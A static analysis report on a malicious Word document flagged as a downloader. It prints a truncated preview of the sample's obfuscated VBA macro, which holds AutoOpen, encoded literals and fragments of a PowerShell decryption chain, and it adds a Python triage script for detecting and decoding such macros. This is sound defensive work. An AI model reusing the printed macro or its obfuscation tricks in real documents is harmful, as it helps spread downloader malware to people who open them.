Verdict: MALICIOUS
Risk Score: 224

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment

Malware Insights
The sample is a malicious Office document whose VBA project defines an AutoOpen entry point, so the macro runs as soon as the document is opened (the usual initial-execution technique for this class of lure). The ClamAV signature Doc.Malware.Emodldr (a downloader signature name) together with the CreateObject call indicates a downloader whose role is to fetch and run a second-stage payload. The carved macros.bas is the recovered VBA source of that project, not a separate payload; what it adds is a view of the obfuscation: dead-code Select Case branches, long junk-wrapped string literals passed through a decoder routine (PXFdF), and, inside those literals, fragments of a PowerShell command (cOnVerTtO-SECurEstRINg -K with a numeric key, a [Runtime.InteropServices.Marshal] SecureStringTo... call, indexing into $SHEllId, a common way to spell out cmdlet names from the characters of a built-in variable). That pattern means the next stage is decrypted and assembled in memory at runtime rather than stored in clear. Because no complete URL or command line is recoverable from the static preview, the report stops at the signature-level family hint rather than a precise attribution.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): the VBA project defines an AutoOpen entry point, which runs when the document is opened.
- CreateObject call (high, OLE_VBA_CREATEOBJ): the macro instantiates COM objects through CreateObject.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this is the heuristic's generic description: for this sample a VBA project was recovered (macros.bas below), so treat the finding as redundant with the AutoOpen finding rather than as evidence of a WordBasic-only document.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that any Office document with embedded drawings carries; it is not a network indicator and should not be blocked or hunted on.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40974 bytes | 95219e1e95ae73e4794a503e7e04a2df466b78fc2238b0a01212bec9d1dd4b0b |

Detection for macros.bas: ClamAV reports no threats for the carved source on its own (the Doc.Malware.Emodldr hit above is against the parent document). Obfuscation or payload: likely; the carved artifact contains 19 long base64-like blobs.
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "NClwQGowV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QQfdjilYci"
Function IUuaarQpLJOiiB()
On Error Resume Next
Select Case jKQmvf
Case 51809
Rzhzd = Hex(26125 - CSng(6443) - 84068 + ChrW(NzGvo))
WtBsm = mmjdz
End Select
CfncLFz = PXFdF("4UfcIAMwBkADEAMgA1ADAAZQAyAGEAMQA1ADgANQA3ADMAMAAyAGUANgBkADcAZABjAGIANwBiADUAYwBhADgANwA3ADEAMQAXjH0", 5, 93)
Select Case wNhHZ
Case 70984
JwuNzo = Hex(33023 - CSng(85671) - 26729 + ChrW(ZBjrou))
tmoOiN = VdAHd
End Select
Select Case ZWEdXY
Case 21648
wGIJEh = Hex(97026 - CSng(26391) - 15084 + ChrW(NZlaHT))
CLanw = XIKWV
End Select
VhYvzzNiPzK = PXFdF("I,8BA2ADYAZQBkADYANAAxAGIAZQA1ADAAYQBlADkAYQAxADgAMQA2ADYANQBlADgAZAA3AGYANwA0ADMANwBmADcAOAA2AGMAZAA5AGUAYgA4AGQANQBlAGMANYjK", 5, 119)
Select Case uMbijp
Case 53454
BuMzt = Hex(76280 - CSng(96312) - 89685 + ChrW(OzPlW))
MkLAi = BtLcfM
End Select
Select Case IXXHjB
Case 68930
zkMnC = Hex(27180 - CSng(2370) - 58214 + ChrW(hlYhSw))
LDQGjF = owNiz
End Select
XPXniGOHEa = PXFdF("J5rBAZABkAGIAZgA0ADIANAA5AGEAMAAzAGUAMQBlADEAYgBlAGIAZgBjADMAIuXnq", 5, 57)
Select Case hFWQW
Case 92161
iRFjC = Hex(5457 - CSng(95068) - 47282 + ChrW(sCpbqv))
kdYtjY = pjDTFc
End Select
Select Case kvhLGR
Case 24919
mkFRlY = Hex(90909 - CSng(80404) - 28586 + ChrW(wFojwW))
uUYhT = YsPiF
End Select
fGWazpVWjr = PXFdF("5wNwAyADIAMAAwADcAMgA1ADMAZQBjADcAYgAwADYAOQA3ADEAYgBiADQANABiADUAZABjAGIAMgAyAGIAMwBlADIAYgBlADcANgA0ADIAYQAyADMAZgA4AGQAO5Tpj", 3, 121)
Select Case JGDOLh
Case 93351
lLrlvE = Hex(78444 - CSng(45764) - 67249 + ChrW(DzLpLw))
ESYjZW = qtFYur
End Select
Select Case pYoLW
Case 29885
opNuOn = Hex(81443 - CSng(51260) - 90942 + ChrW(QSfhp))
jouIz = lVnVLz
End Select
dXDFLIz = PXFdF("5dEPJ,114,186,28,235,81,71,74,70,203,169,62,37)) ) )| & ( $SHEllId[1]+$4p", 6, 66)
Select Case hYIjcF
Case 75080
pBThrJ = Hex(8648 - CSng(93713) - 4370 + ChrW(kzOFXb))
wtEsG = bsiOzI
End Select
Select Case MROBr
Case 90466
JLNNG = Hex(86670 - CSng(55108) - 72053 + ChrW(FQtuR))
kCDhrG = iuKoK
End Select
LXWuLMI = PXFdF("busHNADYANwBkADcAYQAzAGYAYQA1AGMAZgAzADcAYwBmAGMAZAA4AGIAZQAzAGYAMwA1AGEAMABkAGQANwAkd", 6, 79)
Select Case ivdrr
Case 85759
OWFzZZ = Hex(22623 - CSng(30278) - 21717 + ChrW(DrnOh))
zJDwo = TCSiUH
End Select
Select Case TojBqK
Case 39895
GKjcu = Hex(77996 - CSng(72535) - 955 + ChrW(iKiKUP))
YNncDq = qOhCI
End Select
RCREIfTU = PXFdF("pgA1AGQAZQA2ADYA' | cOnVerTtO-SECurEstRINg -K 107,78,130,13,65,226,162,247,35,243,236,251jjJu,3q2", 2, 89)
Select Case LQhjv
Case 78499
kkwGz = Hex(71717 - CSng(35294) - 49629 + ChrW(iSzZv))
dWsKQz = NMmdpb
End Select
Select Case UXsjKl
Case 78708
jaVwiN = Hex(49472 - CSng(49344) - 26356 + ChrW(sVfdIV))
fJlmC = HzDzml
End Select
DBLiOH = PXFdF("j13UDUAYgBiADAAYQA5ADgANABlADkAMAA0ADcANAA1ADEAR8FU", 5, 43)
Select Case STdvch
Case 1921
AmWlUI = Hex(50598 - CSng(47781) - 90890 + ChrW(PXUfcD))
hlNAaP = onfYsj
End Select
Select Case nlkwv
Case 81817
FHNTW = Hex(983 - CSng(71641) - 37716 + ChrW(ZlIVv))
FJuwBz = VthPRD
End Select
KuHPU = PXFdF("dP([rUnTime.intEroPSErvicES.marShAl]::([RunTIME.iNTERopSerVICes.marSHal].gETMeMBeRs()[4].nAME).inVOke([RuNTiMe.iNTEropsERVICEs.mARShal]::sEcuReStrINgTo5.b5f", 3, 149)
Select Case inJpaq
Case 94796
... (truncated)
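As an added example, not code from the report or from the sample, the Python below performs on decoded VBA text the same kind of static triage the heuristics above describe: it looks for auto-execution entry points and execution tokens (the AutoOpen / CreateObject / p-code-token rule), counts long base64-like literals (the "19 long base64-like blobs" check), and recovers the text hidden in the junk-wrapped literals. The macro's own decoder, PXFdF, is not in the visible preview, so its argument semantics are unknown and are not reproduced; instead the example exploits the fact that the literals look like base64 of UTF-16LE text (the repeating "AGQA"-style quartets) and decodes each literal at all four base64 alignments, keeping only alignments that yield NUL-separated printable ASCII. The token lists, the 40-character blob threshold and the 6-character run minimum are assumptions chosen for illustration. The sample VBA is constructed: its first literal is copied verbatim from the `DBLiOH = PXFdF(...)` line of the preview, the second is a constructed junk-wrapped literal.

```python
"""Static triage of extracted VBA source, mirroring the report's macro heuristics.

Added example (not the analyzer's or the sample's code). Token lists and
thresholds are assumptions for illustration.
"""
import base64
import re

# Entry points that run without user interaction (assumed list, Word/Excel subset).
AUTOEXEC = re.compile(
    r"\b(?:AutoOpen|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b", re.I)
# Tokens indicating object creation, shell or download capability (assumed list).
EXEC_TOKENS = re.compile(
    r"\b(?:CreateObject|WScript\.Shell|Shell|powershell|URLDownloadToFile|XMLHTTP|ADODB\.Stream)\b",
    re.I)
# "Long base64-like blob": a run of base64-alphabet characters; 40 is an assumed threshold.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# UTF-16LE-encoded printable ASCII is a sequence of (byte, NUL) pairs; require 6+ characters.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def recover_utf16_strings(blob: str) -> list[str]:
    """Return printable UTF-16LE runs hidden in a base64 blob padded with junk.

    The junk prefix shifts the real base64 payload by an unknown number of
    characters, so each of the four possible alignments is decoded. Only the
    correct one produces whole NUL-separated ASCII bytes; the other three are
    bit-shifted and never form such pairs. A junk byte adjacent to the payload
    can survive as a stray leading or trailing character of the recovered run.
    """
    found: list[str] = []
    for start in range(4):
        chunk = blob[start:]
        chunk = chunk[: len(chunk) - len(chunk) % 4]  # drop an incomplete tail quartet
        if len(chunk) < 8:
            continue
        try:
            raw = base64.b64decode(chunk, validate=True)
        except ValueError:  # binascii.Error (bad padding) is a ValueError
            continue
        found.extend(m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(raw))
    return found


def triage_vba(source: str) -> dict:
    """Apply AutoOpen / CreateObject / p-code-style token checks to VBA source text."""
    blobs = B64_RUN.findall(source)
    recovered = [s for blob in blobs for s in recover_utf16_strings(blob)]
    autoexec = sorted({m.group() for m in AUTOEXEC.finditer(source)}, key=str.lower)
    exec_tokens = sorted({m.group() for m in EXEC_TOKENS.finditer(source)}, key=str.lower)
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "base64_blobs": len(blobs),
        "recovered": recovered,
        # The rule the p-code heuristic states: an auto-exec token plus an execution token.
        "autoexec_with_exec": bool(autoexec) and bool(exec_tokens),
    }


# Constructed sample in the shape of the carved macro. The first literal is copied from the
# report's preview; the second is a constructed junk-wrapped base64(UTF-16LE) literal.
# PXFdF is the sample's decoder, whose body is not visible in the preview; it is not called here.
SAMPLE_VBA = r'''
Attribute VB_Name = "QQfdjilYci"
Sub AutoOpen()
    On Error Resume Next
    DBLiOH = PXFdF("j13UDUAYgBiADAAYQA5ADgANABlADkAMAA0ADcANAA1ADEAR8FU", 5, 43)
    cmdline = PXFdF("kQ7YwBtAGQAIAAvAGMAIABjAGEAbABjAC4AZQB4AGUA9Lm", 4, 40)
    Set obj = CreateObject(Chr(87) & "Script.Shell")
End Sub
'''

if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run against the constructed sample, the report's own literal decodes (at alignment 3) to `5bb0a984e9047451`: the fifteen characters `bb0a984e9047451` are the literal's payload and the leading `5` is a junk byte that happened to decode as printable, which is why recovered strings should be read with their edges in doubt. The constructed literal decodes to `cmd /c calc.exe`. To triage the real macros.bas, pass the file's text to `triage_vba` and compare the blob count with the 19 the report states; the same alignment search also exposes the fragments quoted in the summary without having to understand PXFdF.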